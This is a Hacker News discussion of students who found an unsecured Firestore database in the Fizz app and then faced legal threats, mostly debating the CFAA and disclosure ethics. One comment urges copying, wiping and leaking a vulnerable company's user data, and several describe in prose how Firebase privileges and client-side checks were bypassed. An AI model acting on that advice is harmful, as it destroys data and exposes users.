       | Sure you still get some of that today. An especially old
       | fashioned company, or in this case naive college students but
       | overall things have shifted quite dramatically in favor of
       | disclosure. Dedicated middle men who protect security
       | researcher's identities, Large enterprises encouraging and
       | celebrating disclosure, six figure bug bounties, even the laws
       | themselves have changed to be more friendly to security
       | researchers.
       | 
       | I'm sure it was quite unpleasant to go through this for the
       | author, but it's a nice reminder that situations like this are
       | now somewhat rare as they used to be the norm (or worse).
        
         | _greim_ wrote:
         | I wonder if this was the students' attempt to protect their
         | future careers as much as anything--"keep quiet about this or
         | else"--especially given the issues were quickly fixed. In that
         | sense it differs from the classic 90s era retaliation. From the
         | students' POV it was probably quite terrifying. I wouldn't
         | discount intervention by wealthy parents either, but of course
         | I know nothing of the situation or the people involved.
        
         | formerly_proven wrote:
         | > Suggestions of anonymous email accounts and that sort of
         | thing.
         | 
         | This is still the way to go even in many western countries.
        
         | lamontcg wrote:
         | The problem is that it is still entirely illegal to do this
         | kind of hacking without any permission.
         | 
         | The fact that a lot of companies have embraced bug bounties and
         | encourage this kind of stuff against them unfortunately teaches
         | "kids" that this kind of thing is perfectly
         | legal/moral/ethical/etc.
         | 
         | As this story shows though you're really rolling the dice, even
         | though it worked out in this case.
         | 
         | > Discussions in forums / BBS's would be around if it was safe
         | to disclose at all. Suggestions of anonymous email accounts and
         | that sort of thing.
         | 
         | This is probably still a better idea if you don't have the
         | cooperation of the target of the hack via some stated bug
         | bounty program. But that doesn't help the security researcher
         | "make a name" for themselves.
         | 
         | And you're basically admitting to the fact that you trespassed,
         | even if all you did was the equivalent of walking through an
         | unlocked door and verifying that you could look inside their
         | refrigerator.
         | 
         | The fact that it may play out in the court of public opinion
         | that you were helping to expose the lies of a corporation
         | doesn't change the fact than in the actual courts you are
         | guilty of a crime.
        
           | Buttons840 wrote:
           | Yeah, when it comes to cyber-security, we put our national
           | security at risk so companies can avoid being embarrassed.
           | (See my rant in another comment.)
        
             | asynchronous wrote:
             | As much as I hate using regulation as a hammer to fix
             | things, if we did make software companies legally required
             | to a level of security, then vulnerability testing like
             | this could be prosecuted similar to SEC or OSHA violations
             | and would work quite nicely
        
               | Buttons840 wrote:
               | Protecting white-hat hackers could be seen as a reduction
               | in "regulation", since it permits the good guys to do
               | good things. It allows people to _do_ more, but some
               | people will be not be legally shielded from embarrassment
               | and accountability anymore.
               | 
               | In the current status quo, everyone except the good guys
               | gets free reign: companies can stop legal scrutiny of
               | their security, black-hats run wild and answer to no one,
               | and the white-hats wring their hands "please sir, may I
               | check for myself that the services I depend on are
               | secure?" to which the companies respond "ha ha, no, but
               | trust us, it's secure."
        
       | JakeAl wrote:
       | In short, if they are a company and are not 100% secure and they
       | say they are then they are committing fraud. The person doing the
       | testing is providing the evidence for a legal case and no amount
       | of legal threats change that.
        
       | jccalhoun wrote:
       | This sounds a lot less interesting than the title makes it out to
       | be. Is the fact that it is a "classmate" really relevant? Would
       | the events have happened differently if it was another company
       | with no connection to the school?
        
       | lxe wrote:
       | There should be harsher penalties for lawyers like Hopkins &
       | Carley for threatening security researchers and engaging in
       | unprofessional conduct like this.
        
       | winter_blue wrote:
       | This isn't the first time a security research who's politely and
       | confidentially disclosed a vulnerability has been threaned.
       | There's an important lesson to glean from this.
       | 
       | The next time someone discovers a company that has poor database
       | security, they should, IMO: (1) make a full copy of confidential
       | user data, (2) delete all data on the server, (3) publish
       | confidential user data on some dumping site; and protect their
       | anonymity while doing all 3 of these.
       | 
       | If these researchers had done (2) and (3) - and done so
       | _anonymously_ , that would have _not only_ protected them from
       | legal threats /harm, but also effectively killed off a company
       | that shouldn't exist - since all of Buzz/Fizz users would likely
       | abandon it as consequence.
        
         | AnimalMuppet wrote:
         | So your solution for possibly being prosecuted for something
         | marginal is to do several things for which it would be much
         | more reasonable to be prosecuted? That seems like a rather
         | unwise solution to the problem.
         | 
         | It's especially unwise because you now give the company a
         | massive incentive to hire real forensics specialists to try to
         | track you down. You're placing a lot of faith in your ability
         | to remain anonymous under that level of scrutiny.
        
         | jstarfish wrote:
         | > The next time someone discovers a company that has poor
         | database security, they should, IMO: (1) make a full copy of
         | confidential user data, (2) delete all data on the server, (3)
         | publish confidential user data on some dumping site; and [4]
         | protect their anonymity while doing all 3 of these.
         | 
         | Aaron Swartz only did (1). Failing at (4) didn't end so well
         | for him.
         | 
         | I get that you're frustrated but encouraging others to make
         | martyrs of themselves is cowardice. If some dumb kid tries this
         | and their opsec isn't bulletproof, they're fucked. Put your own
         | skin in the game and do it yourself if your convictions are
         | that strong.
        
         | pc86 wrote:
         | "To avoid a baseless legal threat you should commit multiple
         | felonies" is certainly an interesting take.
        
           | meepmorp wrote:
           | Well, at that point, the legal threats stop being baseless.
           | Problem solved!
        
         | dragonwriter wrote:
         | > If these researchers had done (2) and (3) - and done so
         | anonymously, that would have not only protected them from legal
         | threats/harm
         | 
         | No, it wouldn't. Anonymity can be penetrated, and the more
         | incentive people have to do so, the more likely it will be.
        
       | [deleted]
        
       | icameron wrote:
       | The Stanford Daily article says "At the time, Fizz used Google's
       | Firestore database product to store data including user
       | information and posts...Fizz did not have the necessary security
       | rules set up, making it possible for anyone to query the database
       | directly...phone numbers and/or email addresses for all users
       | were fully accessible, and that posts and upvotes were directly
       | linkable to this identifiable information....Moreover, the
       | database was entirely editable -- it was possible for anyone to
       | edit posts, karma values, moderator status, and so on."
       | 
       | That's wild!
        
         | gregsadetsky wrote:
         | Speaking of, are there tools to audit/explore
         | firebase/firestore databases i.e. see if collections/documents
         | are readable?
         | 
         | I imagine a web tool that could take the app id and other api
         | values (that are publicly embedded in frontend apps),
         | optionally support a session id (for those firestore apps that
         | use a lightweight "only visible to logged in users" security
         | rule) and accept names of collections (found in the js code) to
         | explore?
        
           | saligrama wrote:
           | Baserunner [1] does exactly this. I described using it for
           | Firebase security research in my blog post [2].
           | 
           | [1] https://github.com/iosiro/baserunner
           | 
           | [2] https://saligrama.io/blog/post/firebase-insecure-by-
           | default/
        
         | morpheuskafka wrote:
         | A few years ago I found that HelloTalk (a language learning
         | pen-pal app) stored the actual GPS coordinates of users in a
         | SQLite that you can find in your iOS backup. The maps in-app
         | showed only a general location (pin disappeared at a certain
         | zoom).
         | 
         | You could also bypass the filter preventing searching for over
         | 18 if you are under/under if you are over, and paid-only
         | filters like location, gender, etc. by rewriting the requests
         | with a mitmproxy (paid status is not checked server-side).
        
         | iancarroll wrote:
         | This is unfortunately a very common issue with Firebase apps.
         | Since the client is writing directly to the database, usually
         | authorization is forgotten and the client is trusted to only
         | write to their own objects.
         | 
         | A long time ago I was able to get admin access to an electric
         | scooter company by updating my Firebase user to have isAdmin
         | set to true, and then I accidentally deleted the scooter I was
         | renting from Firebase. I am not sure what happened to it after
         | that.
        
           | yismail wrote:
           | If I recall correctly, you can set your firebase rules such
           | that a user can only read/write/delete certain collections
           | based on conditions such as if user.email ==
           | collection.email.
        
             | justrealist wrote:
             | Doing authorization within firestore breaks down instantly
             | outside of toy applications.
        
           | jacquesm wrote:
           | I think deleting a scooter is against some law of
           | conservation :)
        
           | singleshot_ wrote:
           | One interesting thing about the statute of limitations is
           | "the discovery rule."
           | 
           | For example, say the statute of limitations for 18 USC 1030
           | is two years. If a person hypothetically stole a scooter by
           | hacking, two years later, they would be in the clear, right?
           | 
           | No. The discovery rule says that if a damaged party, for good
           | reason, does not immediately discover their loss, the
           | statutes of limitations is paused until they do.
           | 
           | Accordingly, if the scooter company read a post today about a
           | hack that happened "a long time ago" and therein discovered
           | their loss, the statute of limitations would begin to tick
           | today and the hacker could be in legal jeopardy for two more
           | years.
        
             | henriquez wrote:
             | Does this apply to criminal or just civil?
        
               | btilly wrote:
               | Generally it applies to both. But some crimes (eg murder)
               | might not have a statute of limitations.
               | 
               | https://www.law.cornell.edu/wex/statute_of_limitations
               | 
               | Also there are subtle questions around what discovery
               | means here. Usually it is some sort of "could be
               | discovered with reasonable effort". If I had proof of
               | your wrongdoing in a letter sent to me, I am unlikely to
               | get away with saying, "Oh, I didn't read the letter when
               | I got it." If that proof was buried in a computer file
               | with a million pages, I probably can reasonably say,
               | "That was a needle in a haystack, and I didn't even know
               | what to look for." For situations between those extremes,
               | there will be case law that likely varies by state.
               | 
               | This is where a lawyer gets to earn their pay.
        
               | singleshot_ wrote:
               | Huge arrow pointing to "varies by state" on all of this.
               | 
               | 1030 (which is, of course, federal law) actually has a
               | specific discovery/statute of limitations in the text of
               | the statute, and so may not be affected by state
               | discovery rule law.
        
             | iancarroll wrote:
             | The scooter company was well aware of it as I told them
             | about that + several other issues immediately. :)
        
               | singleshot_ wrote:
               | Well that makes me smile. I should have figured there was
               | more to that story!
        
           | dudus wrote:
           | It is common. But before you curse at Google here. This is
           | VERY well documented. When you create a database the UI
           | screams at you that it's in dev mode, that security has not
           | been setup etc.... if you keep ignoring the database will
           | eventually close itself down automatically.
           | 
           | So this is entirely on the dev team to blame.
        
           | manicennui wrote:
           | Which is why I hate that people keep claiming that you don't
           | need to know what you are doing nor employ anyone who knows
           | what they are doing to setup infrastructure. You might be
           | able to stand things up without knowing what you are doing,
           | but you probably shouldn't be running it in production that
           | way.
        
       | utopcell wrote:
       | Given the aggressive response from this company, it is less
       | likely that it will become the target of any security researchers
       | in the future (who wants the hassle ?). That by itself makes
       | their app less secure in the long term. Also, who'd want to
       | support founders with this "I will destroy you!, even though you
       | helped me improve my system" mentality ? I wouldn't be surprised
       | if this startup dies off from this info.
       | 
       | Kudos to Cooper, Miles and Aditya for seeing this through.
        
       | wedn3sday wrote:
       | Maybe its just my Oppositional Defiant Disorder talking, but I
       | would have nuked their db after that bs threat.
        
         | rootusrootus wrote:
         | > Maybe its just my Oppositional Defiant Disorder talking
         | 
         | Is that the clinical term for Internet Tough Guy?
         | 
         | I imagine deleting the DB would almost certainly lead to actual
         | CFAA consequences. Which kinda suck, as I recall.
        
           | xigency wrote:
           | Yeah, it's unwise, but also a fair warning. If you threaten
           | someone who has leverage over you, you might find your own
           | problems escalated. Not everyone behaves perfectly rationally
           | under pressure.
        
       | tptacek wrote:
       | I'm not a lawyer, but I am professionally interested in this
       | weird branch of the law, and it seems like EFF's staff attorney
       | went a bit out on a limb here:
       | 
       | * Fizz appears to be a client/server application (presumably a
       | web app?)
       | 
       | * The testing the researchers did was of software running on
       | Fizz's servers
       | 
       | * After identifying a vulnerability, the researchers created
       | administrator accounts using the database activity they obtained
       | 
       | * The researchers were not given permission to do this testing
       | 
       | If that fact pattern holds, then unless there's a California law
       | governing this that I'm not aware of --- and even then, federal
       | supremacy moots it, right? --- I think they did straightforwardly
       | violate the CFAA, contra the claim in their response.
       | 
       | At least three things mitigate their legal risk:
       | 
       | 1. It's very clear from their disclosure and behavior after
       | disclosing that they were in good faith conducting security
       | research, making them an unattractive target for prosecution.
       | 
       | 2. It's not clear that they did any meaningful damage (this is
       | subtle: you can easily rack up 5-6 figure damage numbers from
       | unauthorized security research, but Fizz was so small and new
       | that I'm assuming nobody even contemplating retaining a forensics
       | firm or truing things up with their insurers, who probably did
       | not exist), meaning there wouldn't have been much to prosecute.
       | 
       | 3. Fizz's lawyers fucked up and threatened a criminal prosecution
       | in order to obtain a valuable concession fro the researchers,
       | which, as EFF points out, violates a state bar rule.
       | 
       | I think the good guys prevailed here, but I'm wary of taking too
       | many lessons from this; if this hadn't been "Fizz", but rather
       | the social media features of Dunder Mifflin Infinity, the outcome
       | might have been gnarlier.
        
         | shkkmo wrote:
         | I don't think you have the pattern of facts correct (unless you
         | have access to more information than what is in linked the
         | Stanford Daily article).
         | 
         | > At the time, Fizz used Google's Firestore database product to
         | store data including user information and posts. Firestore can
         | be configured to use a set of security rules in order to
         | prevent users from accessing data they should not have access
         | to. However, Fizz did not have the necessary security rules set
         | up, making it possible for anyone to query the database
         | directly and access a significant amount of sensitive user
         | data.
         | 
         | > We found that phone numbers and/or email addresses for all
         | users were fully accessible, and that posts and upvotes were
         | directly linkable to this identifiable information. It was
         | possible to identify the author of any post on the platform.
         | 
         | So AFAICT there is no indication they created any admin
         | accounts to access the data. This is yet another example of an
         | essentially publicly accessible database that holds what was
         | supposed to be private information. This seems like a far less
         | clear application of the CFAA than the pattern of facts you
         | describe.
        
           | adolph wrote:
           | https://news.ycombinator.com/item?id=37297823#37298972
           | 
           |  _Really what happened is we checked whether we could set
           | `isAdmin` to `true` on our existing accounts, and... we were
           | able to. Adi 's more technical writeup has details:
           | https://saligrama.io/blog/post/firebase-insecure-by-default/_
        
         | mewse-hn wrote:
         | If that fact pattern holds, then unless there's a California
         | law governing this that I'm not aware of --- and even then,
         | federal supremacy moots it, right? --- I think they did
         | straightforwardly violate the CFAA, contra the claim in their
         | response.
         | 
         | I am extremely not a lawyer but the pattern of legal posturing
         | I've observed is that some lawyer makes grand over-reaching
         | statements, the opposing lawyer responds with their own grand
         | over-reaching statements.
         | 
         | "My clients did not violate the CFAA" should logically be
         | interpreted as "good fucking luck arguing that my good faith
         | student security researcher clients violated the CFAA in
         | court".
        
         | whimsicalism wrote:
         | All that matters is whether it's a prosecutable charge
        
         | hnav wrote:
         | I think intent matters for actually securing an indictment and
         | conviction, if for example they can prove that you exfiled
         | their user data (this happened to Weev who noticed an ordinal
         | ID in a URL and enumerated all possible URLs) they could
         | actually get the feds to bust you. But you're right, if they're
         | big enough they could try to come after your regardless at the
         | risk of turning the security research community against them.
        
         | tptacek wrote:
         | A friend points out that the limb EFF was out on was sturdy
         | indeed, since DOJ has issued a policy statement saying they're
         | not going after good-faith security research.
         | 
         | https://www.justice.gov/opa/pr/department-justice-announces-...
        
           | doctorpangloss wrote:
           | So then you'd concede that all that's left is these Fizzbuzz
           | people are liars and are bad people, and that their product
           | is crap and should not be used, and you don't need to have
           | personally used the app nor met them personally to know any
           | of that, since it's all clear from their extremely obnoxious,
           | self destructive conduct, and that that's just an opinion and
           | not a forecast on whether or not their useless investors will
           | get a return?
        
             | tptacek wrote:
             | Perhaps you missed this line from my original comment:
             | 
             |  _I think the good guys prevailed here._
        
               | doctorpangloss wrote:
               | Yeah definitely. It's just to say that the security
               | researchers, these classmates, didn't get lucky. Like if
               | I were a Stanford student, and I heard about this shitty
               | website, you know, if I were generalizing, I wouldn't be
               | wrong to guess it was run by obnoxious people and that
               | the technology was a big lie.
               | 
               | And this website, this forum, it has a maligned love
               | affair with the anti establishment characters, and it
               | can't really figure out this one because it's dropouts v.
               | hackers on the face of it. Most of the comments are
               | litigating the law, by non lawyers and even when by
               | lawyers, by people who absolutely could not predict the
               | future of a legal decision. Why not just trust your gut?
               | What I want to hear - what I want to be the #1 comment
               | forever and for all time, which is just my opinion - is
               | like, this research never needed to happen to know that
               | Fizz or whatever is absolute trash. Do you see what I am
               | saying?
               | 
               | There are a lot of 18-22 year olds pursuing
               | entrepreneurship out of college aged vengeances. Y
               | Combinator funds many such founders! And here we see the
               | double edged sword: if you're at Stanford touting
               | yourself an entrepreneurial genius with your app about
               | antagonizing your classmates, you had better actually
               | bring the bacon to your supposed technology. Because you
               | have more than your founding team's worth of classmates
               | who hate your guts, but can actually program.
        
           | asynchronous wrote:
           | I remember when the DOJ announced that and it still isn't
           | good enough to protect security researchers by saying "we
           | won't prosecute, trust us"
        
           | Ajedi32 wrote:
           | To me that reads less as "this is legal" and more as "this is
           | illegal, but we (the executive branch of the government) will
           | be nice and not go after you for it as long as we think
           | you're a good guy". That's (arguably) better than nothing,
           | but not exactly an ideal way to structure our justice system
           | in my opinion.
        
             | whimsicalism wrote:
             | You aren't a lawyer, right?
        
               | ZoomerCretin wrote:
               | Laws are written by legislators, not the Department of
               | Justice. An administrative decision by the executive
               | branch does not change that fact. Accessing a computer
               | system without explicit authorization or "hacking" is a
               | federal crime. If you "hack", you can be charged with a
               | felony for doing so at the discretion of federal
               | prosecutors. The law isn't some magical too-
               | incomprehensible-for-mortals text requiring magicians and
               | soothsayers to interpret _literally_ every single clause
               | and statement for you. As an adult citizen of a country
               | (with an IQ above room temperature), you should be able
               | to correctly interpret statements like the above, as was
               | done by the person to whom you replied.
        
             | deepsun wrote:
             | Yes, but I don't see a better solution. If we make
             | "security research" legal, then any hacker can just say "oh
             | I was just going to disclose my findings to them".
        
               | philistine wrote:
               | Here's a better solution: change the laws!
               | 
               | Knowing the audience of this forum, you're probably
               | American and under 35. You have lived your whole life
               | with an inoperable legislator. The US Congress, through a
               | mixture of time-honored traditions with unfathomable
               | externalities (there can never be more than this amount
               | of representatives) and disinterested sports-like
               | politics, is unable to print new laws in a reactive
               | fashion. This means that kludges, with their own
               | unfathomable externalities, look like sane solutions.
               | They're not. A functioning democracy would set up a legal
               | framework for ethical research.
        
               | tptacek wrote:
               | You get that the legal situation for this stuff is even
               | gnarlier in Europe, right?
        
               | giantg2 wrote:
               | Not really, many professional researchers notify law
               | enforcement when engaging in something that could be
               | viewed as illegal or generate calls to the police.
               | 
               | What should happen is the addition of a "reasonable"
               | standard and using existing case law policy positions to
               | not prosecute people who have a reasonable basis
               | supporting their claim of security research.
               | 
               | Instead we'll be left with the lazy lawmakers doing
               | nothing and the executive saying they'll prosecute only
               | the people who "deserve" it.
        
               | seanw444 wrote:
               | I hate the use of "reasonable" in law. Who's to define
               | what's reasonable?
        
               | deepsun wrote:
               | Similar in flight rules: one cannot fly a paraglider over
               | "congested area". But what is "congested area" is
               | intentionally not defined in the rules, and left up to
               | judges to decide for each case separately.
               | 
               | Because if FAA tries to come up with a definition, there
               | will always be weird unjust corner cases. Or just ban the
               | paragliders whatsoever. I think the current ambiguity is
               | the best compromise.
        
               | buttercraft wrote:
               | Judges and juries
        
               | dannyphantom wrote:
               | That's fair.
               | 
               | The use of "reasonable" in generally used to qualify some
               | standard of behavior or conduct that is expected from
               | individuals in specific situations. Because "reasonable"
               | is inherently subjective, the responsibility for making
               | the determination is (generally) passed over to a jury
               | who will weigh what the prosecution and defense have
               | presented which entails previous cases, the specific fact
               | pattern of the case being deliberated, etc.
               | 
               | There are also situations where an actual judge makes the
               | determination but generally, in a criminal context, it's
               | up to a jury.
        
               | [deleted]
        
         | gsdofthewoods wrote:
         | Good analysis. One important caveat is that, while this may
         | technically have been a CFAA violation, it's almost certainly
         | not one the Department of Justice would prosecute.
         | 
         | Last year, the department updated its CFAA charging policy to
         | not pursue charges against people engaged in "good-faith
         | security research." [1] The CFAA is famously over-broad, so a
         | DOJ policy is nowhere near as good as amending the law to make
         | the legality of security research even clearer. Also, this
         | policy could change under a new administration, so it's still
         | risky--just less risky than it was before they formalized this
         | policy.
         | 
         | [1] https://www.justice.gov/opa/pr/department-justice-
         | announces-...
        
         | theptip wrote:
         | Good analysis. I'm really confused why in the 2020s anybody
         | thinks that unsolicited pentesting is a sane or welcome thing
         | to do.
         | 
         | The OP doesn't seem to have a "mea culpa" so I hope they
         | learned this lesson even if the piece is more meme-worthy with
         | a "can you believe what these guys tried to do?" tone.
         | 
         | While their intent seems good, they were pretty clearly
         | breaking the law.
        
           | trailbits wrote:
           | What about due diligence? If you're about to send and store
           | sensitive information with a service, a service that claims
           | to be 100% secure.... shouldn't you have the right to verify
           | that the security is up to snuff? These researchers weren't
           | attempting to harm anybody. What's wrong with kicking the
           | tires?
        
           | Jka9rhnDJos wrote:
           | > I'm really confused why in the 2020s anybody thinks that
           | unsolicited pentesting is a sane or welcome thing to do.
           | 
           | Because bug bounties?
        
             | theptip wrote:
             | Bug bounties are not "unsolicited".
        
           | paganel wrote:
           | > I'm really confused why in the 2020s anybody thinks that
           | unsolicited pentesting is a sane or welcome thing to do.
           | 
           | I was looking for a comment like this. You couldn't pay me
           | enough to do this sort of thing in this day and age (unless
           | working for a DoD or 3-letter agency contractor, which would
           | have my back covered), nevermind to do it _pro bono_ or _bona
           | fide_ or whatever it is that these guys had in mind (either
           | way, it looks like they were not paid to do it).
           | 
           | This sort of action might still have been sort of ok-ish in
           | the late '00s, maybe going into 2010, 2011, but when the
           | Russian/Chinese/North Korean/Iranian cyber threats became
           | real (plus the whole Snowden fiasco) then related laws began
           | to change (both in the US and in Europe) and doing this sort
           | of stuff with no-one to back you up for real (forget the EFF)
           | meant that the one doing it would be asking for trouble in a
           | big way.
        
           | px43 wrote:
           | A security researcher checking on Firestore permissions is
           | basically the equivalent of an electrician walking into a
           | grocery store and noticing sparking wires dangling and taped
           | awkwardly, and imminent fire hazards that could result in
           | catastrophic damages to people shopping at the store.
           | 
           | It is absolutely the right, and IMO, the duty, of security
           | researchers to test every website, app, product and service
           | that they use regularly to ensure the continued safety of the
           | general public. This is too important of a field to have a
           | "not my problem" attitude of just ignoring egregious security
           | vulnerabilities so they can be exploited by criminals.
        
           | negidius wrote:
           | As a user, I definitely welcome it. It's necessary precisely
           | because companies like this lie about their security
           | practices and endanger their users.
           | 
           | The question isn't whether it should be done, but whether it
           | should be done anonymously or openly.
        
           | talideon wrote:
           | You may want to read this, as it explains why no mea culpa
           | was necessary: https://www.justice.gov/opa/pr/department-
           | justice-announces-...
           | 
           | TL;DR: it was good faith security research, and the US DoJ
           | doesn't prosecute that.
        
           | marcod wrote:
           | While what you say is true, I feel strongly that it shouldn't
           | be. It is morally right to show if a product that is used by
           | many fellow students is marketed as "100% secure"* is in fact
           | very vulnerable.
           | 
           | If some less ethical hackers got a hold of that data, much
           | worse things could have happened.
           | 
           | * that's the biggest red flag. A company saying 100%
           | obviously has very little actual security expertise.
           | 
           | PS: I'm a big fan of Germany's https://www.ccc.de/en/ who
           | have pulled many such hacks against some of the biggest tech
           | companies.
        
             | dahwolf wrote:
             | Devil's advocate:
             | 
             | I get into your home by bypassing (poor) security. I take
             | pictures and make copies of anything inside. Then I
             | publicly announce the breach and demand that you fix your
             | security based on a deadline I made up. Then I say "trust
             | me, bro" when I promise to never reveal the data I stole.
             | 
             | Nobody would find any of that moral. The analogy breaks
             | down because your home is not a place where sensitive data
             | of lots of people is stored. But even then if you'd do the
             | same thing in a physical place where this would be the
             | case, you'd simply be arrested, if not (accidentally) shot.
             | 
             | I do agree that these security researchers are ultimately
             | doing a good thing, but they should not be this naive and
             | aggressive about it.
        
               | bawolff wrote:
               | > I get into your home by bypassing (poor) security. I
               | take pictures and make copies of anything inside. Then I
               | publicly announce the breach and demand that you fix your
               | security based on a deadline I made up. Then I say "trust
               | me, bro" when I promise to never reveal the data I stole.
               | 
               | Otoh, it sounds really different if you break into your
               | own home.
               | 
               | I think part of the issue is with everything in the cloud
               | your data is no longer local (like it would have been
               | back in the day), but you (or the custumer public) still
               | has an interest in knowing if the data is secure, an
               | interest that is at odds with the service provider who
               | often has perverse incentives to not care about security.
        
               | dahwolf wrote:
               | I agree that there's friction between the greater public
               | good and private interests.
               | 
               | But I don't agree with the reductive take that
               | compromised security means companies don't care or are
               | greedy. Companies that do care and have an army of
               | security staff still fuck up.
               | 
               | The reality check is that security is incredibly
               | complicated, expensive, very easy to do incorrectly.
               | 
               | If anything, us software developers should do some
               | reflection on our software stack. It's honestly quite
               | shit if it requires daily updates and a team of security
               | gurus to not get it wrong.
        
               | bluepod4 wrote:
               | Yeah, I sort of get your point.
               | 
               | > So _we did what any good security researcher does_ : We
               | responsibly disclosed what we found. We wrote a detailed
               | vulnerability disclosure report. We suggested
               | remediations. And we proactively agreed not to talk about
               | our findings publicly before an _embargo date_ to give
               | them time to fix the issues. Then we sent them the report
               | via email.
               | 
               | This is why the whole "I can't believe my classmates
               | threatened legal action" line of thinking doesn't make
               | sense. They weren't acting like classmates themselves.
               | They were acting like professionals. I imagine the
               | embargo date wasn't well-received.
               | 
               | It's also interesting that they listed all of the steps
               | they followed that a "good security researcher" would do.
               | So why didn't they start with communication first before
               | trying to hack the system? Good security researchers do
               | that. (Not all of the time, obviously.)
               | 
               | > Well, a me and few security-minded friends were _drawn
               | like moths to a flame_ when we heard that. Our classmates
               | were posting quite sensitive stories on Fizz, and we
               | wanted to make sure their information was secure.
               | 
               | > So one Friday night...
               | 
               | And this is where the "good-faith security research" line
               | of reasoning broke down for me. Think about the wording.
               | To my ears/eyes, those sentences above seem like a
               | carefully crafted but still flimsy excuse. It's like a
               | lie that you tell yourself over and over so much that you
               | end up believing it. It seems like the researchers just
               | wanted to have some fun on a Friday night (like he said).
               | (And there's nothing wrong with that. But to characterize
               | it as _only_ doing "good faith security research" seems
               | like a stretch.) I guess I'm saying that I'm just not
               | convinced. I don't buy it.
               | 
               | But I get it. Articles need to be written. Talks needs to
               | be given.
               | 
               | (And yes, I do believe that Fizz didn't need to threaten
               | legal action.)
        
               | bawolff wrote:
               | > So why didn't they start with communication first
               | before trying to hack the system? Good security
               | researchers do that. (Not all of the time, obviously.)
               | 
               | I don't think that is true. I think it would be very
               | unusual for an independent (not a pentester) security
               | researcher to communicate anything before they have any
               | findings.
               | 
               | > It seems like the researchers just wanted to have some
               | fun on a Friday night (like he said). (And there's
               | nothing wrong with that. But to characterize it as only
               | doing "good faith security research" seems like a
               | stretch.)
               | 
               | I don't get it. Good faith research is fun. Most people
               | don't get into the industry because they hate the work. I
               | don't even understand what you are trying to imply was in
               | their mind that would disqualify their actions from being
               | in good faith.
        
               | dahwolf wrote:
               | Agreed.
               | 
               | I think they should negotiate a security test beforehand.
               | For their own sake but also to get a buy-in. And if a
               | company categorically refuses, you can then publish that,
               | or share that you worry about a lack of track record in
               | known security audits. That's a professional way to hold
               | them accountable.
               | 
               | Breaking into a system unannounced and then stating "do
               | what I say...OR ELSE", is neither legal nor professional.
               | When you're surprised that this will be perceived as an
               | attack instead of being helpful, I don't know what to
               | say.
        
             | skshfksjdj wrote:
             | Incentives usually have unintended consequences.
             | 
             | The laws that would apply to unsolicited pentesting make it
             | undesirable to perform it.
             | 
             | Thus, society as a whole is less secure because someone
             | wants to protect companies from hacking.
        
               | marcod wrote:
               | Yes, same with the more general "whistleblowers".
               | Unethical companies will always try to punish those who
               | expose them.
        
         | kjjw wrote:
         | [flagged]
        
         | emilecantin wrote:
         | I presume that the "limb" the EFF attorney went on is basically
         | what would've been disputed in a court of law. It's easily
         | argued that if an app is so badly configured that just
         | _following the Firebase protocol_ can give you write access to
         | the database, you haven't actually circumvented any security
         | measures, because _there weren't any to circumvent_.
         | 
         | It reminds me of the case where AT&T had their iPad data
         | subscriber data just sitting there on an unlisted webpage.
         | Don't remember which way it went, but I think the guy went out
         | of his way there to get all the data he could get, which isn't
         | the case here.
        
           | dgunay wrote:
           | Not a lawyer ofc, but I would not expect that line of
           | reasoning to hold up in court as I wouldn't expect "the door
           | was unlocked, your honor" to excuse trespassing.
        
             | darkarmani wrote:
             | So every URL is a trespass unless you have explicit
             | permission?
             | 
             | If you say the protocol determines authorization, then the
             | Fizz protocol granted them authorization. I don't have a
             | clear answer here because it is messy.
        
               | dahfizz wrote:
               | Its not all or nothing. The law is literally decided on a
               | case by case basis.
               | 
               | Going to the home page of a public website is clearly
               | authorized access. Creating admin users for yourself on
               | someone else's server without permission is clearly
               | unauthorized access. Any judge or jury would agree.
        
               | tptacek wrote:
               | It depends on how you uncovered the URL and what's behind
               | it: your intent, which is most of what matters here.
        
             | [deleted]
        
           | tptacek wrote:
           | _It reminds me of the case where AT &T had their iPad data
           | subscriber data just sitting there on an unlisted webpage.
           | Don't remember which way it went_
           | 
           | He ended up in prison.
           | 
           | (The conviction was later overturned on a jurisdictional
           | detail, but I think he spent several months in federal
           | prison.)
        
           | xeromal wrote:
           | What's with the _ in your sentences?
        
             | rictic wrote:
             | Ascii convention to emphasize text, similar to doing the
             | same thing with _asterisks_. Markdown later used this
             | syntax for italics and bold, which popularized it further.
        
             | oidar wrote:
             | Not the GP, but that is a common way of bolding words
             | between the underscores in markdown syntax.
        
             | jjtheblunt wrote:
             | i think it's supposed to look like start and stop of
             | underlines.
        
             | wpietri wrote:
             | They represent underlining.
        
             | [deleted]
        
           | dahfizz wrote:
           | IANAL, but the law does not require you to "circumvent"
           | anything[1].
           | 
           | Simply, anyone who "accesses a computer without authorization
           | ... and thereby obtains ... information from any protected
           | computer" is in violation of the CFAA.
           | 
           | If the researchers in question did not download any customer
           | data, nor cause any "damages", I am not sure they are guilty
           | of anything. BUT, if they had, "the victim had insufficient
           | security measures" is not a valid defense. These researchers
           | were not authorized to access this computer, regardless of
           | whether they were technically able to obtain access.
           | 
           | Leaving your door unlocked does not give burglars permission
           | to burgle you.
           | 
           | [1] https://www.law.cornell.edu/uscode/text/18/1030
        
             | bagels wrote:
             | Everyone that is doing security research without
             | permission, and doesn't catch charges, is just luckier (or
             | less annoying) than weev:
             | https://www.wired.com/2013/03/att-hacker-gets-3-years/
        
             | jrockway wrote:
             | That's my understanding of the law. Even the "merge this PR
             | without review using your administrator privileges" is
             | potentially a crime if the company policy doesn't allow you
             | to take that action. Basically, what the code does or
             | intends is not a factor at all, only the potentially-
             | implicit authorization policy controls.
             | 
             | If I tell you "the password on the postgres account at
             | postgres.jrock.us is blahblah42" and you read the database,
             | it could be argued that you're exceeding your authorized
             | access. The reason people don't tell you their database
             | password on Hacker News is because of countries that don't
             | have that law, I assume.
        
               | nephanth wrote:
               | I will not take out cash in public transport because I
               | don't want to be pickpocketed
               | 
               | Now, does that mean that if I did, you'd have the right
               | to pickpocket me?
        
               | yebyen wrote:
               | > The reason people don't tell you their database
               | password on Hacker News is because of countries that
               | don't have that law, I assume.
               | 
               | That's silly, the reason people protect themselves is so
               | that they are protected. Legal protection is another
               | different kind of protection, but I think it's a deep
               | stretch to argue that one can remove all the technical
               | protections and still keep access to the CFAA and obtain
               | meaningful protection from the law.
               | 
               | > protected computer
               | 
               | If you're suggesting that the CFAA itself protects the
               | computer by definition, then you've excluded the
               | possibility of a such thing as an "unprotected computer"
               | which renders the extra word unnecessary. I don't think
               | that's the intention, that all computers gain the
               | implicit protection, I think there actually needs to be a
               | policy or standard enforced, or ownership made clear.
               | 
               | In the tradition of US property law, I think you need to
